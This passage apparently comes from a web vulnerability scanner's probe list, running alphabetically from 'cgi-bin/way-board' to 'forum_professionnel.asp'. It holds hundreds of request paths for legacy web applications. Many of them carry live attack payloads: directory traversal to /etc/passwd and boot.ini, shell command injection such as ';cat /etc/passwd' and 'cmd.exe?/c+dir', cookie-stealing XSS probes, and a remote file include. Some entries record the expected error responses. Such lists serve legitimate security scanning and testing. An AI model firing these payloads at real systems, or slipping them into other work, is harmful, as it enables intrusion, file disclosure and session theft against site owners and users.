cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/wconsole.dll
cgi-bin/webais
cgi-bin/webbbs.cgi
cgi-bin/webbbs.exe
cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
cgi-bin/webdist.cgi
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/webdriver
cgi-bin/webfind.exe?keywords=01234567890123456789
cgi-bin/webgais
cgi-bin/webif.cgi
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/webmap.cgi
cgi-bin/webnews.pl
cgi-bin/webplus.exe?about
cgi-bin/webplus?about
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/websendmail
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webutil.pl
cgi-bin/webutils.pl
cgi-bin/webwho.pl
cgi-bin/wguest.exe
cgi-bin/where.pl?sd=ls%20/etc
cgi-bin/whois.cgi?action=load&whois=%3Bid
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/windmail
cgi-bin/windmail.exe
cgi-bin/wrap
cgi-bin/ws_ftp.ini
cgi-bin/www-sql
cgi-bin/wwwadmin.pl
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard.pl
cgi-bin/wwwstats.pl
cgi-bin/wwwthreads/3tvars.pm
cgi-bin/wwwthreads/w3tvars.pm
cgi-bin/wwwwais
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/zsh
cgi-dos/args.bat
cgi-lib.pl
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-shl/win-c-sample.exe
cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-sys/FormMail-clone.cgi
cgi-sys/addalink.cgi
cgi-sys/cgiecho
cgi-sys/cgiemail
cgi-sys/countedit
cgi-sys/domainredirect.cgi
cgi-sys/entropybanner.cgi
cgi-sys/entropysearch.cgi
cgi-sys/helpdesk.cgi
cgi-sys/mchat.cgi
cgi-sys/randhtml.cgi
cgi-sys/realhelpdesk.cgi
cgi-sys/realsignup.cgi
cgi-sys/scgiwrap
cgi-sys/signup.cgi
cgi-win/cgitest.exe
cgi-win/uploader.exe
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
cgi/cgiproc?
cgicso?query=<script>alert('Vulnerable')</script>
cgicso?query=<script>alert('XSS')</script>
cgicso?query=AAA
cgiforum.pl?thesection=../../../../../../../../../../etc
cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgimail.exe
cgis/wwwboard/wwwboard.cgi
cgis/wwwboard/wwwboard.pl
cgitest.exe
cgiwrap
cgiwrap/%3Cfont%20color=red%3E
cgiwrap/~@U
cgiwrap/~@USERS
cgiwrap/~JUNK(5)
cgiwrap/~root
change-your-password.pl
chassis/config/GeneralChassisConfig.html
chat/!nicks.txt
chat/!pwds.txt
chat/data/usr
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
chat_dir/register.php
chatlog.nsf
checkout_payment.php
class/mysql.class
classified.cgi
classifieds
classifieds.cgi
classifieds/classifieds.cgi
classifieds/index.cgi
clbusy.nsf
cldbdir.nsf
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
clickcount.pl?view=test
clickresponder.pl
client/
cliente/
clientes/
clients/
clocktower/
clusta4.nsf
clusterframe.jsp
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
cm/
cmd.exe?/c+dir
cmd1.exe?/c+dir
code.php
code.php3
code/
collect4.nsf
com
com/
com/novell/
com/novell/gwmonitor/help/en/default.htm
com/novell/webaccess
com/novell/webaccess/help/en/default.htm
com/novell/webpublisher/help/en/default.htm
com5..........................................................................................................................................................................................................................box
com5.java
com5.pl
commandit.cgi
comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
commerce.cgi?page=../../../../../../../../../../etc
commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
common.php?f=0&ForumLang=../../../../../../../../../../etc
common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
common/listrec.pl
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
communicator/
communique.asp
community/forumdisplay.php
community/index.php?analized=anything
community/member.php
compatible.cgi
compra/
compras/
compressed/
compte.php
conecta/
config.inc
config.php
config/
config/checks.txt
config/html/cnf_gi.htm
connect/
console
conspass.chl+
consport.chl+
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
content/base/build/explorer/none.php?/etc/passwd
contents.php?new_language=elvish&mode=select
contents/extensions/asp/1
convert-date.php
correo/
count.cgi
counter-ord
counter/
counter/1/n/n/0/3/5/0/a/123.gif
counterbanner
counterbanner-ord
counterfiglet-ord
counterfiglet/nc/
cp/rac/nsManager.cgi
cpa.nsf
cpanel/
cplogfile.log
cpqlogin.htm
credit/
crypto/
cs
csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csLive
csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csNews.cgi
csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
csPassword.cgi
csPassword.cgi?command=remove%20
csPassword/csPassword.cgi
csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
csh
css
cstat.pl
cuenta/
cuentas/
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
custdata/
customerdata.nsf
customers/
cutecast/members/
cutenews/comments.php
cutenews/index.php?debug
cutenews/search.php
cutenews/shownews.php
cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cvsblame.cgi?file=<script>alert('XSS')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
cvslog.cgi?file=<script>alert('Vulnerable')</script>
cvslog.cgi?file=<script>alert('XSS')</script>
cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
da.nsf
dan_o.dat
dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
dasp/fm_shell.asp
dat/
data.sql
data/
data/config/microsrv.cfg
data/fetch.php?page=
data/member_log.txt
data/userlog/log.txt
database.nsf
database/
database/db2000.mdb
database/metacart.mdb
database/metacart.mdb+
databases/
databse.sql
date
dato/
datos/
day5datacopier.cgi
day5datanotifier.cgi
db.nsf
db.php
db.php?q='&t='
db.sql
db/
db/users.dat
db2www/library/document.d2w/show
db4web_c/dbdirname//etc/passwd
db_manager.cgi
dbabble
dbase/
dbman/db.cgi?db=no-db
dbmlparser.exe
dc/auth_data/auth_user_file.txt
dc/orders/orders.txt
dcforum.cgi?az=list&forum=../../../../../../../../../../etc
dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
dclf.nsf
dcp/advertiser.php
dcshop/auth_data/auth_user_file.txt
dcshop/orders/orders.txt
debug/dbg?host==<script>alert('Vulnerable');</script>
debug/echo?name=<script>alert('Vulnerable');</script>
debug/errorInfo?title===<script>alert('Vulnerable');</script>
debug/showproc?proc===<script>alert('Vulnerable');</script>
decsadm.nsf
decsdoc.nsf
decslog.nsf
default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
default.nsf
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
defines.php
demo/
demo/basic/simple/viewsrc/welcomeuser.jsp.txt
demo/ojspext/events/globals.jsa
demo/sql/index.jsp
demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
demos/
dev/
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
devel/
development/
dfire.cgi
diagnose.cgi
diapo.php?rep=<script>alert(document.cookie)</script>
dig.cgi
dir/
dirassist.nsf
directory.php?dir=%3Bcat%20/etc/passwd
directory/
directorypro.cgi?want=showcat&show=../../../../../../../../../../etc
directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
displayTC.pl
dltclnt.php
dms0
dnewsweb
do_map
do_subscribe
doc
doc-html/
doc/
doc/admin/index.php
doc/domguide.nsf
doc/dspug.nsf
doc/help4.nsf
doc/helpadmin.nsf
doc/helplt4.nsf
doc/internet.nsf
doc/javapg.nsf
doc/lccon.nsf
doc/migrate.nsf
doc/npn_admn.nsf
doc/npn_rn.nsf
doc/packages/
doc/readmec.nsf
doc/readmes.nsf
doc/rt/overview-summary.html
doc/smhelp.nsf
doc/srvinst.nsf
doc/webmin.config.notes
docs/
docs/<script>alert('Vulnerable');</script>
docs/NED
docs/NED?action=retrieve&location=.
docs/sdb/en/html/index.html
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
doladmin.nsf
dols_help.nsf
domadmin.nsf
domcfg.nsf
domguide.nsf
domlog.nsf
donothing
dose.pl?daily&somefile.txt&|ls|
dostuff.php?action=modify_user
dotproject/modules/files/index_table.php
dotproject/modules/projects/addedit.php
dotproject/modules/projects/view.php
dotproject/modules/projects/vw_files.php
dotproject/modules/tasks/addedit.php
dotproject/modules/tasks/viewgantt.php
down/
download.cgi
download.php?op=viewdownload
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
download/
downloads/
downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
dspug.nsf
dumpenv.pl
easylog/easylog.html
echo.bat
echo.bat?&dir+c:\\
edit.pl
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
ejemplo/
ejemplos/
email.php
emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
emml_email_func.php
employees/
empower?DB=whateverwhatever
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
emumail.cgi?type=.%00
emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
enter.cgi
entete.php
enteteacceuil.php
envia/
enviamail/
environ.cgi
environ.pl
environ.pl?param1=<script>alert(document.cookie)</script>
erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
error/HTTP_NOT_FOUND.html.var
error_log
errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
es/
eshop.pl/seite=;cat%20eshop.pl|
esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
etc/passwd
etc/shadow+
event.nsf
eventcal2.php.php
events.nsf
events4.nsf
events5.nsf
eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
ews/ews/architext_query.pl
ex-logger.pl
examples/
examples/basic/servlet/HelloServlet
examples/context
examples/cookie
examples/forward1
examples/forward2
examples/header
examples/include1
examples/info
examples/jsp/index.html
examples/jsp/snp/anything.snp
examples/jsp/snp/snoop.jsp
examples/jsp/source.jsp??
examples/servlet/AUX
examples/servlet/TroubleShooter
examples/servlets/index.html
examples/session
examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
excel/
exchange/
exchange/lib/AMPROPS.INC
exchange/lib/ATTACH.INC
exchange/lib/DELETE.INC
exchange/lib/GETREND.INC
exchange/lib/GETWHEN.INC
exchange/lib/JSATTACH.INC
exchange/lib/JSROOT.INC
exchange/lib/JSUTIL.INC
exchange/lib/LANG.INC
exchange/lib/PAGEUTIL.INC
exchange/lib/PUBFLD.INC
exchange/lib/RENDER.INC
exchange/lib/SESSION.INC
exchange/lib/logon.inc
exchange/root.asp?acs=anon
excite
excite;IF
excite;IFS=\
exe/
exec/show/config/cr
ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
ext.ini.%00.txt
ez2000/ezadmin.cgi
ez2000/ezboard.cgi
ez2000/ezman.cgi
ezadmin.cgi
ezboard.cgi
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
ezman.cgi
ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
ezshopper2/loadpage.cgi
ezshopper3/loadpage.cgi
faqman/index.php
faqmanager.cgi?toc=/etc/passwd%00
faxsurvey?cat%20/etc/passwd
fbsd/
fcgi-bin/echo
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
file-that-is-not-real-2002.php3
file/
file/../../../../../../../../etc/
fileadmin/
filemail
filemail.pl
filemanager/filemanager_forms.php
filemanager/index.php3
filemgmt/brokenfile.php
filemgmt/singlefile.php
filemgmt/viewcat.php
filemgmt/visit.php
files/
finance.xls
finances.xls
finger
finger.pl
firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
flexform
flexform.cgi
fom.cgi?file=<script>alert('Vulnerable')</script>
fom.cgi?file=<script>alert('XSS')</script>
fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
foo.php3
forgot_password.php?email=\"><script>alert(document.cookie)</script>
formmail
formmail.cgi
formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
formmail.pl
formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
foro/YaBB.pl
fortune
forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd
forum-ra.asp?n=../../../../../../../../../etc/passwd%00
forum-ra.asp?n=/../../../../../../../../../../../boot.ini
forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra.asp?n=/etc/passwd
forum-ra.asp?n=/etc/passwd%00
forum-ra.asp?n=c:\boot.ini
forum-ra_professionnel.asp?n=%60/etc/passwd%60
forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
forum-ra_professionnel.asp?n=../../boot.ini
forum-ra_professionnel.asp?n=/....../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
forum-ra_professionnel.asp?n=/../../../etc/passwd
forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum-ra_professionnel.asp?n=/etc/passwd
forum-ra_professionnel.asp?n=/etc/passwd%00
forum-ra_professionnel.asp?n=c:\boot.ini
forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum/
forum/admin/database/wwForum.mdb
forum/admin/wwforum.mdb
forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
forum/mainfile.php
forum/member.php
forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
forum/newreply.php
forum/newthread.php
forum/viewtopic.php
forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
forum1.asp?n=1753&amp;nn=/....../boot.ini
forum1.asp?n=1753&amp;nn=/..../boot.ini
forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1.asp?n=1753&amp;nn=/etc/passwd
forum1.asp?n=1753&amp;nn=/etc/passwd%00
forum1.asp?n=1753&amp;nn=c:\boot.ini
forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
forum_arc.asp?n=268
forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
